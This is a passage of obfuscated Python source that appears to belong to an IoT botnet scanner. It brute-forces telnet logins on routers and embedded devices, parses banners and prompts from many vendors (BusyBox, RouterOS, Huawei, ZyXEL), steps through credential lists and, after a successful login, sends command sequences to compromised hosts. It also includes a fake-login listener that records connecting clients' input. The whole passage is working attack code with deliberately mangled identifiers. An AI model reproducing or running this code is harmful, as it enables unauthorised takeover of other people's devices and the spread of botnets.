     if ':' in O0Oo [ o00O0OoOoo ] and ( 'Login' in O0Oo [ o00O0OoOoo ] or 'login' in O0Oo [ o00O0OoOoo ] or 'username' in O0Oo [ o00O0OoOoo ] or 'user name' in O0Oo [ o00O0OoOoo ] or 'Username' in O0Oo [ o00O0OoOoo ] or 'USERNAME' in O0Oo [ o00O0OoOoo ] or 'LOGIN' in O0Oo [ o00O0OoOoo ] ) or 'Account:' in O0Oo [ o00O0OoOoo ] :
5508
      if 87 - 87: Oooo % Ii % OOooOO0 + Oo0 / Oooo
5509
      iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 1
5510
      if 7 - 7: IIiII
5511
     if ':' in O0Oo [ o00O0OoOoo ] and ( 'assword' in O0Oo [ o00O0OoOoo ] or 'pass word' in O0Oo [ o00O0OoOoo ] ) :
5512
      if 34 - 34: I11I1Ii + IIiII
5513
      iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 3
5514
      if 72 - 72: Ii11i1iIi
5515
    if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 2 :
5516
     if 91 - 91: IIiIii1iI * i1IIi1i1iiI + Ii / oOOoO00oo0
5517
     if ':' in O0Oo [ o00O0OoOoo ] and ( 'assword' in O0Oo [ o00O0OoOoo ] or 'pass word' in O0Oo [ o00O0OoOoo ] ) :
5518
      if 40 - 40: Ii11i1iIi * I11I1Ii / i1IIi1i1iiI
5519
      iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 3
5520
      if 12 - 12: Oooo
5521
    if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 4 :
5522
     if 19 - 19: Oooo - Ii11i1iIi / o0oooooO . I11I1Ii % IIiII
5523
     if 9 - 9: IIiIii1iI % i1IIi1i1iiI / O0oo
5524
     if not 'Last login:' in O0OO0oOoO0O00 [ o00O0OoOoo ] and ( 'incorrect' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'Incorrect' in O0OO0oOoO0O00 [ o00O0OoOoo ] or ( ':' in O0OO0oOoO0O00 [ o00O0OoOoo ] and ( 'Login' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'login' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'username' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'user name' in O0Oo [ o00O0OoOoo ] or 'Username' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'USERNAME' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'LOGIN' in O0OO0oOoO0O00 [ o00O0OoOoo ] ) ) or 'unrecognized user' in O0OO0oOoO0O00 [ o00O0OoOoo ] or "Invalid password" in O0OO0oOoO0O00 [ o00O0OoOoo ] ) :
5525
      if 18 - 18: IIiIIiIii1I
5526
      if 18 - 18: o0oooooO * oOoO0Ooo + i1IIi1i1iiI / I11I1Ii
5527
      if not 'RouterOS' in O0OO0oOoO0O00 [ o00O0OoOoo ] and not 'critical login failure for user' in O0OO0oOoO0O00 [ o00O0OoOoo ] and not 'Completes the command' in O0OO0oOoO0O00 [ o00O0OoOoo ] and not '[admin@' in O0OO0oOoO0O00 [ o00O0OoOoo ] :
5528
       IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5529
       i11i1iIIii [ IIiIIiIiIi ] += 1
5530
       if i11i1iIIii [ IIiIIiIiIi ] >= len ( i1O00o0O [ IIiIIiIiIi ] ) :
5531
        i11i1iIIii [ IIiIIiIiIi ] = 0
5532
       ooOO ( O0O0 )
5533
       continue
5534
      else :
5535
       oooo00O [ o00O0OoOoo ] = 'R'
5536
       if 89 - 89: Oo0 + IIiIIiIii1I - Ii
5537
       if 29 - 29: IIiII
5538
     IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5539
     if not 'admin/' in i1O00o0O [ IIiIIiIiIi ] and '________admin,' in O0OO0oOoO0O00 [ o00O0OoOoo ] :
5540
      Oo00oO0O = re . search ( '__________admin,([^_]*)______' , O0OO0oOoO0O00 [ o00O0OoOoo ] )
5541
      if Oo00oO0O :
5542
       i1O00o0O [ IIiIIiIiIi ] = [ 'admin/' + Oo00oO0O . group ( 1 ) ]
5543
       Ii111i11iIi ( 'NOTC: IP %s:%d -> retry with lc %s' % ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , i1O00o0O [ IIiIIiIiIi ] [ 0 ] ) )
5544
       i11i1iIIii [ IIiIIiIiIi ] = 0
5545
       ooOO ( O0O0 )
5546
       continue
5547
       if 52 - 52: Oo0Oo * O0oo0OOOOO00 * o0ooO - i1 % Oo0 / Ii11i1iIi
5548
     i11iiIiIII1I = O0OO0oOoO0O00 [ o00O0OoOoo ] [ - 40 : ]
5549
     iII1II1i1I = O0OO0oOoO0O00 [ o00O0OoOoo ] [ - 80 : ]
5550
     if ( re . search ( '[$%#>] $' , i11iiIiIII1I [ - 2 : ] ) and not 'assword>' in i11iiIiIII1I [ - 10 : ] ) or 'Press enter key' in i11iiIiIII1I or re . search ( '\[\S+@\S*\] > ' , i11iiIiIII1I ) or 'BusyBox v' in O0OO0oOoO0O00 [ o00O0OoOoo ] or '? for help' in O0OO0oOoO0O00 [ o00O0OoOoo ] or ': not found' in i11iiIiIII1I or 'exit system' in i11iiIiIII1I or ( 'User Access Verification' in O0Oo [ o00O0OoOoo ] and re . search ( '[A-Z0-9a-z\-][#>]$' , i11iiIiIII1I [ - 2 : ] ) ) or 'Password expiration warning' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'for a list of built-in commands' in iII1II1i1I or 'step into administration terminal' in iII1II1i1I or 'Incomplete command found at' in iII1II1i1I or 'welcome to use cli' in O0OO0oOoO0O00 [ o00O0OoOoo ] or ( 'Login authentication' in O0Oo [ o00O0OoOoo ] and re . search ( '[A-Z0-9a-z]\>$' , i11iiIiIII1I [ - 2 : ] ) ) or 'Main menu' in O0OO0oOoO0O00 [ o00O0OoOoo ] or '% Unrecognized command' in i11iiIiIII1I or 'ATP>' in i11iiIiIII1I or re . search ( 'HG\d\S+>$' , i11iiIiIII1I ) or 'Last login: ' in iII1II1i1I :
5551
      if 21 - 21: OOooOO0
5552
      if 25 - 25: OOOoOooO . Oooo % O0oo % oOOoO00oo0 - Ii - IIiIIiIii1I
5553
      if 32 - 32: oOoO0Ooo % IIiIIiIii1I % oOoO0Ooo / IIiIIiIii1I * i1
5554
      O0o0iI [ IIiIIiIiIi ] = i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] ;
5555
      if 5 - 5: OOooOO0 . OOOoOooO
5556
      if 86 - 86: IIiII - IIiIii1iI + i1 / OOOoOooO . i1 - Ii11i1iIi
5557
      i1O00o0O [ IIiIIiIiIi ] = [ O0o0iI [ IIiIIiIiIi ] ]
5558
      i11i1iIIii [ IIiIIiIiIi ] = 0
5559
      if 61 - 61: i1IIi1i1iiI % o0ooO / Oooo * oOoO0Ooo / Oo0Oo
5560
      iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 5
5561
      if 72 - 72: IIiIIiIii1I - Ii - O0oo0OOOOO00
5562
    if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 6 :
5563
     if 7 - 7: oOOoO00oo0 / IIiIIiIii1I % IIiIii1iI - o0oooooO . I11I1Ii * Ii
5564
     if 83 - 83: OOooOO0
5565
     if 16 - 16: o0oooooO / IIiII % o0oooooO % OOOoOooO
5566
     IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5567
     if 97 - 97: Oo0Oo
5568
     if 51 - 51: I11I1Ii + O0oo
5569
     iii = ''
5570
     I1IiIiIIi = ''
5571
     if 64 - 64: I11I1Ii * Ii / oOoO0Ooo % Oo0Oo / oOOoO00oo0 % oOOoO00oo0
5572
     if not iii :
5573
      for I11IIIii1i in ooO0o :
5574
       if 99 - 99: oOoO0Ooo
5575
       if 12 - 12: oOOoO00oo0 * IIiIIiIii1I * oOOo0000o . O0oo - Ii11i1iIi * i1
5576
       if 35 - 35: O0oo . Ii11i1iIi % Oo0 % Oooo
5577
       if 14 - 14: O0oo . o0ooO . IIiIIiIii1I * IIiII + I11I1Ii . Oo0
5578
       if re . search ( I11IIIii1i [ 1 ] , O0o0iI [ IIiIIiIiIi ] ) and re . search ( I11IIIii1i [ 2 ] , O0Oo [ o00O0OoOoo ] ) :
5579
        if 68 - 68: Oooo
5580
        if 15 - 15: I11I1Ii - IIiIii1iI % o0ooO * IIiII
5581
        if 90 - 90: Oooo
5582
        if 60 - 60: oOOo0000o / IIiII - IIiIii1iI - Oo0Oo . i1IIi1i1iiI
5583
        if I11IIIii1i [ 0 ] == 'linux' or I11IIIii1i [ 0 ] == 'telnet' or I11IIIii1i [ 0 ] == 'busybox' or I11IIIii1i [ 0 ] == 'freescale' :
5584
         if O0Oo [ o00O0OoOoo ] . count ( '> ' ) < 6 and O0Oo [ o00O0OoOoo ] . count ( '# ' ) < 6 and O0Oo [ o00O0OoOoo ] . count ( '% ' ) < 6 and O0Oo [ o00O0OoOoo ] . count ( '$ ' ) < 6 and O0Oo [ o00O0OoOoo ] . count ( 'm]#' ) < 6 :
5585
          continue
5586
          if 27 - 27: Oooo % Ii
5587
          if 14 - 14: IIiIIiIii1I
5588
        iii = I11IIIii1i [ 0 ]
5589
        I1IiIiIIi = I11IIIii1i [ 3 : ]
5590
        if 46 - 46: i1 % IIiII
5591
        if 61 - 61: Oo0 - oOOoO00oo0 / Ii11i1iIi * IIiII
5592
        if 52 - 52: OOOoOooO * oOOo0000o % IIiIIiIii1I
5593
        if 43 - 43: O0oo0OOOOO00 % oOOoO00oo0 - oOOoO00oo0
5594
        if 76 - 76: I11I1Ii % IIiIii1iI . Ii % oOOoO00oo0 % IIiIii1iI
5595
        if 76 - 76: oOOo0000o . Oo0Oo % Oooo % OOooOO0 / oOoO0Ooo
5596
        if 39 - 39: oOOo0000o * O0oo + OOOoOooO * Oo0Oo + Oo0 / Ii
5597
        if 5 - 5: oOoO0Ooo
5598
        if 53 - 53: oOOo0000o * Oooo - OOooOO0 / Oooo
5599
        break
5600
        if 67 - 67: O0oo % IIiIIiIii1I * IIiII + i1 - Oo0Oo + IIiIii1iI
5601
     if iii :
5602
      iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 7
5603
      I1IiIii1I1 [ IIiIIiIiIi ] = iii
5604
      ooOo0 [ o00O0OoOoo ] = I1IiIiIIi
5605
      if 38 - 38: O0oo0OOOOO00 - O0oo * O0oo % Ii11i1iIi
5606
      if not ii1iI1I11 ( O0O0 , o00O0OoOoo , IIiIIiIiIi ) :
5607
       continue
5608
       if 61 - 61: oOOoO00oo0 . i1 + i1 + Ii
5609
       if 23 - 23: oOoO0Ooo * Oo0
5610
       if 9 - 9: IIiIIiIii1I / Ii + Oooo + O0oo0OOOOO00 * O0oo % O0oo
5611
       if 47 - 47: O0oo0OOOOO00 % IIiII . Oo0 % Ii
5612
    if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 7 :
5613
     if 18 - 18: OOOoOooO * oOOoO00oo0 * i1IIi1i1iiI * Oo0Oo . i1IIi1i1iiI . Ii11i1iIi
5614
     if 20 - 20: Oo0
5615
     if 30 - 30: oOOo0000o % IIiIii1iI * Oooo
5616
     if 29 - 29: O0oo . OOooOO0 - oOOo0000o % IIiII % OOooOO0
5617
     if re . search ( ooOo0 [ o00O0OoOoo ] [ 1 ] , O0OO0oOoO0O00 [ o00O0OoOoo ] ) :
5618
      if 19 - 19: o0ooO * OOooOO0
5619
      ooOo0 [ o00O0OoOoo ] = ooOo0 [ o00O0OoOoo ] [ 2 : ]
5620
      IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5621
      if not ii1iI1I11 ( O0O0 , o00O0OoOoo , IIiIIiIiIi ) :
5622
       continue
5623
       if 84 - 84: oOOo0000o - O0oo / oOOoO00oo0 * i1 * oOoO0Ooo
5624
   else :
5625
    ooOO ( O0O0 )
5626
    continue
5627
  if O0O0 in O0o0 :
5628
   if 33 - 33: IIiIii1iI * oOOo0000o
5629
   if 55 - 55: O0oo0OOOOO00 / Oooo
5630
   if 84 - 84: IIiIii1iI . I11I1Ii + IIiII
5631
   if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == - 1 :
5632
    try :
5633
     O0O0 . send ( "\n" )
5634
    except :
5635
     ooOO ( O0O0 )
5636
     continue
5637
    iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 0
5638
    if 60 - 60: IIiII - Ii11i1iIi % o0oooooO . Ii - O0oo0OOOOO00
5639
   if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 1 :
5640
    if 43 - 43: o0oooooO * Oo0Oo - oOoO0Ooo * O0oo0OOOOO00 % O0oo0OOOOO00 - oOOoO00oo0
5641
    IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5642
    ii1OoOo0oOO = ''
5643
    if 'XXX:' in i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] :
5644
     Oo00oO0O = re . search ( 'XXX:([^:]+):' , i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] )
5645
     if Oo00oO0O :
5646
      ii1OoOo0oOO = Oo00oO0O . group ( 1 )
5647
    else :
5648
     ii1OoOo0oOO = i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] . split ( '/' ) [ 0 ]
5649
    try :
5650
     if 65 - 65: oOOo0000o - o0ooO - IIiIii1iI - I11I1Ii * I11I1Ii - O0oo
5651
     O0O0 . send ( ii1OoOo0oOO + "\n" )
5652
    except :
5653
     ooOO ( O0O0 )
5654
     continue
5655
    O0OO0oOoO0O00 [ o00O0OoOoo ] = ''
5656
    iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 2
5657
   if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 3 :
5658
    if 85 - 85: IIiIii1iI / oOoO0Ooo / oOOo0000o % IIiII
5659
    IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5660
    O0OoOoo0oOO = ''
5661
    if 75 - 75: OOOoOooO . Oo0 - Oooo . IIiII
5662
    if 'XXX:' in i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] :
5663
     Oo00oO0O = re . search ( 'XXX:[^:]+:(\S+)' , i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] )
5664
     if Oo00oO0O :
5665
      O0OoOoo0oOO = Oo00oO0O . group ( 1 )
5666
    else :
5667
     O0OoOoo0oOO = i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] . split ( '/' ) [ 1 ]
5668
    try :
5669
     if 4 - 4: IIiIIiIii1I - Oo0 . O0oo
5670
     if 84 - 84: IIiIii1iI % Oo0Oo / i1IIi1i1iiI
5671
     O0O0 . send ( O0OoOoo0oOO + "\n\n" )
5672
    except :
5673
     ooOO ( O0O0 )
5674
     continue
5675
    O0OO0oOoO0O00 [ o00O0OoOoo ] = ''
5676
    iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 4
5677
    if 24 - 24: IIiIIiIii1I % oOOo0000o . IIiII - I11I1Ii . o0ooO
5678
    if 73 - 73: I11I1Ii
5679
   if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 5 :
5680
    if 95 - 95: Ii11i1iIi * I11I1Ii % O0oo0OOOOO00 + o0oooooO
5681
    IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5682
    if 69 - 69: O0oo0OOOOO00
5683
    if 76 - 76: Oooo % oOoO0Ooo
5684
    if 38 - 38: IIiIii1iI
5685
    iii = ''
5686
    I1IiIiIIi = ''
5687
    for I11IIIii1i in ooO0o :
5688
     if 75 - 75: IIiIii1iI - IIiIii1iI + i1
5689
     if re . search ( I11IIIii1i [ 1 ] , O0o0iI [ IIiIIiIiIi ] ) and ( I11IIIii1i [ 2 ] == '' or ( I11IIIii1i [ 2 ] == 'PORT:9527:' and IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] == 9527 ) ) :
5690
      iii = I11IIIii1i [ 0 ]
5691
      if 81 - 81: OOOoOooO / Ii11i1iIi - O0oo + oOOo0000o + IIiII / oOOo0000o
5692
      I1IiIiIIi = I11IIIii1i [ 3 : ]
5693
      break
5694
      if 82 - 82: i1IIi1i1iiI - Ii11i1iIi
5695
    if iii :
5696
     iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 7
5697
     I1IiIii1I1 [ IIiIIiIiIi ] = iii
5698
     ooOo0 [ o00O0OoOoo ] = I1IiIiIIi
5699
     if 100 - 100: IIiIIiIii1I * o0oooooO . Oooo % i1 % i1IIi1i1iiI / oOOo0000o
5700
     if 12 - 12: O0oo0OOOOO00 + IIiIii1iI + oOOo0000o
5701
     if not ii1iI1I11 ( O0O0 , o00O0OoOoo , IIiIIiIiIi ) :
5702
      continue
5703
      if 84 - 84: I11I1Ii . O0oo0OOOOO00 * oOoO0Ooo * IIiIii1iI . o0oooooO + Oo0
5704
     continue
5705
    else :
5706
     if 35 - 35: IIiIii1iI * OOOoOooO - O0oo
5707
     try :
5708
      if 91 - 91: O0oo0OOOOO00 % i1IIi1i1iiI
5709
      O0O0 . send ( oOoOOoooo0 )
5710
     except :
5711
      if 17 - 17: oOoO0Ooo * Ii / I11I1Ii . i1 * Oo0
5712
      ooOO ( O0O0 )
5713
      continue
5714
      if 87 - 87: OOOoOooO - i1IIi1i1iiI . Oo0 . O0oo * Ii11i1iIi * IIiIii1iI
5715
     iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 6
5716
     if 63 - 63: o0oooooO / IIiIii1iI % i1IIi1i1iiI * Oo0 . Ii
5717
     continue
5718
     if 4 - 4: OOOoOooO * Ii - i1IIi1i1iiI - o0ooO
5719
     if 89 - 89: Ii11i1iIi / o0oooooO / IIiIIiIii1I % i1 - oOOoO00oo0
5720
     if 49 - 49: IIiIii1iI + Oooo - Ii11i1iIi . Oo0
5721
     if 42 - 42: I11I1Ii % IIiIIiIii1I - Oooo % o0oooooO
5722
     if 85 - 85: Oooo * OOOoOooO
5723
     if 72 - 72: Oo0Oo . Oooo * o0ooO * IIiIii1iI
5724
     if 65 - 65: Oo0 - O0oo / oOOoO00oo0 . o0oooooO . IIiIii1iI
5725
     if 14 - 14: IIiIIiIii1I
5726
     if 95 - 95: i1 + Oooo % IIiII / OOooOO0
5727
     if 67 - 67: IIiII + o0oooooO / IIiIii1iI . o0oooooO + i1IIi1i1iiI
5728
  if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 7 and Iioo0OooOoO > iIiO00000o [ o00O0OoOoo ] :
5729
   if len ( ooOo0 [ o00O0OoOoo ] ) <= 2 :
5730
    if 29 - 29: O0oo . O0oo * i1 + IIiIIiIii1I
5731
    iIiO00000o [ o00O0OoOoo ] = Iioo0OooOoO + 10
5732
    iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 9
5733
    try :
5734
     O0O0 . shutdown ( )
5735
    except :
5736
     pass
5737
     if 41 - 41: IIiII - O0oo0OOOOO00 + OOOoOooO
5738
    continue
5739
   else :
5740
    ooOo0 [ o00O0OoOoo ] = ooOo0 [ o00O0OoOoo ] [ 2 : ]
5741
    IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5742
    if not ii1iI1I11 ( O0O0 , o00O0OoOoo , IIiIIiIiIi ) :
5743
     continue
5744
     if 34 - 34: O0oo / OOooOO0 - oOoO0Ooo % OOOoOooO . Ii % i1IIi1i1iiI
5745
  if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 9 and Iioo0OooOoO > iIiO00000o [ o00O0OoOoo ] :
5746
   ooOO ( O0O0 )
5747
   continue
5748
   if 58 - 58: IIiII
5749
  OoO0oOoooo = ooiI1
5750
  if iiI1iIi1Ii1Iii [ o00O0OoOoo ] >= 5 :
5751
   OoO0oOoooo = O0oOOoO
5752
  if Iioo0OooOoO - Oo000o [ o00O0OoOoo ] > OoO0oOoooo :
5753
   if 1 - 1: i1 . oOoO0Ooo / oOOoO00oo0
5754
   if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 4 :
5755
    IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5756
    if 'command' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'help' in O0OO0oOoO0O00 [ o00O0OoOoo ] :
5757
     if not 'DEBUG avc' in O0OO0oOoO0O00 [ o00O0OoOoo ] and not 'Polycom' in O0OO0oOoO0O00 [ o00O0OoOoo ] :
5758
      if not hash ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] ) in i11IiiI1 :
5759
       oOo00o00O = re . sub ( '\r?\n' , ';' , O0Oo [ o00O0OoOoo ] )
5760
       oOo00o00O = re . sub ( '[^A-Za-z0-9 \.,:;<>\(\)\[\]\-+%!@/#$=]' , '' , oOo00o00O )
5761
       Ii111i11iIi ( 'NOTC: CMDEBUG IP %s:%d %s -> %s' % ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] , oOo00o00O [ : 768 ] ) )
5762
       i11IiiI1 [ hash ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] ) ] = 1
5763
       if 60 - 60: i1IIi1i1iiI
5764
   ooOO ( O0O0 )
5765
   continue
5766
   if 40 - 40: Ii * O0oo * i1 / oOoO0Ooo
5767
   if 83 - 83: Ii - OOOoOooO
5768
   if 93 - 93: o0oooooO % OOOoOooO / oOoO0Ooo / IIiIIiIii1I % O0oo
5769
   if 50 - 50: o0ooO % Ii11i1iIi
5770
   if 40 - 40: Ii
5771
   if 38 - 38: OOooOO0 % i1IIi1i1iiI * o0ooO
5772
   if 59 - 59: oOOo0000o
5773
   if 86 - 86: i1IIi1i1iiI / i1
5774
i1111iI = 17
5775
iIIiiIiI = 5
5776
if 74 - 74: oOoO0Ooo
5777
o0o0O000O = [ ]
5778
oOo0oO000 = { }
5779
I1i1111i111i = { }
5780
IiiI = { }
5781
o0ii1iiIIIIi1i = { }
5782
ii1Ii1iIiIIii = { }
5783
O0O0o00 = { }
5784
if 48 - 48: OOooOO0 / IIiIIiIii1I - O0oo - O0oo
5785
if 66 - 66: i1IIi1i1iiI - Oooo + oOOoO00oo0 * IIiIIiIii1I
5786
def IiIIi11i1i1I ( input ) :
5787
 IIII1II1i1 = ''
5788
 for O0OooO0Oo0O in range ( len ( input ) ) :
5789
  OOO0OOOoo = input [ O0OooO0Oo0O ]
5790
  O0oO00OoO0oO = ord ( OOO0OOOoo )
5791
  if O0oO00OoO0oO < 32 or O0oO00OoO0oO >= 123 or O0oO00OoO0oO == 96 or O0oO00OoO0oO == 36 or O0oO00OoO0oO == 38 :
5792
   IIII1II1i1 += '\\x%02x' % ( O0oO00OoO0oO )
5793
  else :
5794
   IIII1II1i1 += OOO0OOOoo
5795
 return IIII1II1i1
5796
 if 29 - 29: Oo0 / oOOo0000o . o0ooO % I11I1Ii + OOooOO0
5797
 if 1 - 1: i1
5798
def i1I1iiIII11 ( sock ) :
5799
 global i1111iI
5800
 if 8 - 8: O0oo / o0oooooO
5801
 i1i11II1i = hash ( sock )
5802
 try :
5803
  sock . close ( )
5804
 except :
5805
  pass
5806
  if 90 - 90: IIiIIiIii1I * oOOoO00oo0 * IIiIIiIii1I + Oo0Oo . oOoO0Ooo
5807
 if ii1Ii1iIiIIii [ i1i11II1i ] == 0 :
5808
  if I1i1111i111i [ i1i11II1i ] >= 3 :
5809
   if 45 - 45: o0oooooO * oOOoO00oo0 - O0oo / I11I1Ii + Oo0Oo
5810
   oOo00o00O = IiIIi11i1i1I ( IiiI [ i1i11II1i ] )
5811
   OoooOO = re . sub ( '\r?\n' , ';' , oOo0oO000 [ i1i11II1i ] [ 2 ] )
5812
   OoooOO = re . sub ( '[^A-Za-z0-9]' , '' , OoooOO )
5813
   if 77 - 77: Oo0 % oOOo0000o * OOOoOooO - oOOo0000o / i1IIi1i1iiI / o0ooO
5814
   Ii111i11iIi ( "%s:%d HP:%s:%%:%s" % ( oOo0oO000 [ i1i11II1i ] [ 0 ] , oOo0oO000 [ i1i11II1i ] [ 1 ] , OoooOO [ : 16 ] , oOo00o00O [ : 128 ] ) ) ;
5815
   if 44 - 44: oOOoO00oo0 . OOOoOooO / o0oooooO / OOOoOooO - Ii11i1iIi
5816
 o0o0O000O . remove ( sock )
5817
 oOo0oO000 [ i1i11II1i ] = None
5818
 I1i1111i111i [ i1i11II1i ] = None
5819
 IiiI [ i1i11II1i ] = None
5820
 o0ii1iiIIIIi1i [ i1i11II1i ] = None
5821
 ii1Ii1iIiIIii [ i1i11II1i ] = None
5822
 O0O0o00 [ i1i11II1i ] = None
5823
 if 42 - 42: Oo0Oo / Oo0Oo * oOOoO00oo0 * Oo0Oo - OOOoOooO
5824
 if 24 - 24: i1 + o0ooO + Ii11i1iIi - Ii
5825
o0OOo0oo = [
5826
 '-------------------------------\r\n-----Welcome to ATP Cli------\r\n-------------------------------\r\n\r\nLogin: ' ,
5827
 '\r\n(none) login: ' ,
5828
 'Ruijie login: ' ,
5829
 '=======================\r\n        DSL-500B \r\n=======================\r\nLogin: ' ,
5830
 '\r\nralink login: ' ,
5831
 'Login as: ' ,
5832
 'Welcome to Stbs world\r\n\r\nUsername: ' ,
5833
 'BCM96328 Broadband Router\r\nLogin: '
5834
 'BCM99999 Broadband Router\r\nVosLogin: ' ,
5835
 'Welcome Visiting Huawei Home Gateway\r\nCopyright by Huawei Technologies Co., Ltd.\r\n\r\nLogin: ' ,
5836
 'User Access Verification\r\n\r\nUsername: ' ,
5837
 '\r\nWelcome to VeEX(R) V100-IGM/MPX Console.\r\n\r\n(none) login: ' ,
5838
 'ZyXEL P-870HNU-51B\r\nLogin: ' ,
5839
 'Account: ' ,
5840
 'Air5442 login: ' ,
5841
 'Air5650 login: ' ,
5842
 'Air5444TT login: ' ,
5843
 'tc login: ' ,
5844
 'RT-206v4TT login: ' ,
5845
 'BCM96318 Broadband Router\r\nLogin: ' ,
5846
 '\r\nIngenic linux machine\r\nKernel 2.6.31.3 on an mips\r\nkopp login: ' ,
5847
 '\r\nBusyBox on (none) login: ' ,
5848
 'JZ_INGENIC login: ' ,
5849
 ]
5850
o0OOOoOOOO0 = random . choice ( o0OOo0oo )
5851
if 58 - 58: OOooOO0 . o0ooO
5852
def OOo0OoooO ( connsocket , remote_ip , target_port ) :
5853
 if 76 - 76: Oo0Oo * O0oo0OOOOO00 + oOOoO00oo0 + IIiIii1iI * O0oo0OOOOO00 - Oo0
5854
 global o0OOOoOOOO0
5855
 I1I111IiiiI = o0OOOoOOOO0
5856
 IIIIiiIIIiiII = 'Password: '
5857
 if 61 - 61: Ii11i1iIi / IIiII / oOOo0000o / O0oo0OOOOO00 + Oooo - Oooo
5858
 if 0 :
5859
  try :
5860
   connsocket . close ( )
5861
  except :
5862
   pass
5863
  return
5864
 i1i11Ii = ( remote_ip , int ( target_port ) )
5865
 i1i11II1i = hash ( connsocket )
5866
 o0o0O000O . append ( connsocket )
5867
 oOo0oO000 [ i1i11II1i ] = ( remote_ip , int ( target_port ) , I1I111IiiiI , IIIIiiIIIiiII )
5868
 I1i1111i111i [ i1i11II1i ] = - 1
5869
 IiiI [ i1i11II1i ] = ''
5870
 o0ii1iiIIIIi1i [ i1i11II1i ] = ''
5871
 O0O0o00 [ i1i11II1i ] = time . time ( )
5872
 ii1Ii1iIiIIii [ i1i11II1i ] = 0
5873
 if 85 - 85: IIiIii1iI - i1IIi1i1iiI - oOOoO00oo0 - Ii - Oooo
5874
def Oo0Oo0o ( ) :
5875
 global i1111iI
5876
 global iIIiiIiI
5877
 if 36 - 36: o0oooooO - oOoO0Ooo + Ii11i1iIi . o0ooO * oOoO0Ooo % O0oo
5878
 Iioo0OooOoO = time . time ( )
5879
 if 1 - 1: OOooOO0 / OOooOO0 - IIiII
5880
 if 94 - 94: Oo0 % oOOo0000o
5881
 O00Oo = 0.01
5882
 IIiI1i , O0o0 , IiIIiI11I = select . select ( o0o0O000O , o0o0O000O , [ ] , O00Oo )
5883
 for O0O0 in o0o0O000O :
5884
  i1i11II1i = hash ( O0O0 )
5885
  o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR )
5886
  if o0oo0OOOo != 0 :
5887
   if 94 - 94: Ii11i1iIi * Ii11i1iIi + i1IIi1i1iiI - IIiIIiIii1I / OOOoOooO . O0oo
5888
   i1I1iiIII11 ( O0O0 )
5889
   continue
5890
  if O0O0 in IIiI1i :
5891
   O0 = ''
5892
   try :
5893
    O0 = O0O0 . recv ( 2048 )
5894
   except :
5895
    pass
5896
    if 43 - 43: o0oooooO - o0oooooO + O0oo0OOOOO00 - IIiIIiIii1I % oOOo0000o
5897
    if 40 - 40: o0ooO + oOOo0000o
5898
   if O0 :
5899
    o0ii1iiIIIIi1i [ i1i11II1i ] += O0
5900
    if 87 - 87: oOOo0000o / OOOoOooO
5901
    if I1i1111i111i [ i1i11II1i ] == 0 :
5902
     if 35 - 35: OOOoOooO
5903
     if 20 - 20: O0oo0OOOOO00 * i1 % oOOo0000o
5904
     if 22 - 22: Oo0Oo
5905
     if 90 - 90: O0oo * OOOoOooO % O0oo
5906
     if 5 - 5: O0oo0OOOOO00 - Ii11i1iIi
5907
     if 22 - 22: IIiII % o0ooO
5908
     pass
5909
     if 58 - 58: IIiII + O0oo0OOOOO00 % OOOoOooO * Ii11i1iIi - OOooOO0
5910
    if I1i1111i111i [ i1i11II1i ] == 2 :
5911
     if 1 - 1: oOOo0000o - i1IIi1i1iiI . i1 * Ii
5912
